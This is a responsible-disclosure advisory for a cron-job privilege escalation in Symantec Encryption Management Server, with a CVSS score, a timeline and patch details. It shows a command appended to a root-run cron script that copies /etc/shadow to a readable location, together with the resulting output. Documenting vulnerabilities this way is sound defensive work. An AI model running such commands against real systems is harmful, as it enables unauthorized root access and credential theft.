Note: Local Privilege Escalation vulnerability in SEMS <= 3.3.2 MP12 allowing for escalations of privileges to that of the root superuser.

Summary

The tomcat users on an affected Symantec Encryption Management Server (SEMS) is susceptible to privilege escalation vulnerability resulting an gaining root privileges.

Affected Versions

  • Symantec Encryption Management Server <= 3.3.2 MP11

CVSSv3 Score

7.8 (High) CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Technical Details

A reverse shell as tomcat is useful. Root is better. Getting there turned out to be straightforward.

The tomcat user had write access to /etc/cron.daily/tomcat.cron — a daily cron job executed in the context of the root superuser:

1
2

$ ls -al /etc/cron.daily/tomcat.cron
-rwxrwxr-x 1 root tomcat 88 Jul  6 03:58 /etc/cron.daily/tomcat.cron

Writable by tomcat, executed by root. That’s all you need. Appending a command to the cron job:

1

$ echo 'cat /etc/shadow > /tmp/shadow' >> /etc/cron.daily/tomcat.cron

After the next scheduled execution:

1
2
3
4
5
6
7
8

$ ls -l /tmp/shadow
-rw-r--r-- 1 root root 825 Jul  6 04:02 /tmp/shadow

$ cat /tmp/shadow
root:!!:16612:0:99999:7:::
bin:*:16612:0:99999:7:::
daemon:*:16612:0:99999:7:::
...

Full root access. From a Reporter account. Via the search box.

Chaining CVE-2015-8151 into CVE-2015-8150 takes you from low-privileged web UI access to root on the underlying appliance. That’s the kind of finding that makes for a very interesting debrief conversation.

Timeline

DateEvent
2015-07-06Vulnerability discovered
2015-07-30Vendor contacted
2015-08-02Vendor confirms issue
2016-02-19Patch released (v3.3.2 MP12)
2016-06-07Public disclosure

Remediation

Symantec product engineers have addressed these issues in Symantec Encryption Management Server 3.3.2 MP12. Customers should update to SEMS 3.3.2 MP12 as soon as possible to address these issues.

Credit

Discovered and reported by Toby Reynolds following responsible disclosure guidelines.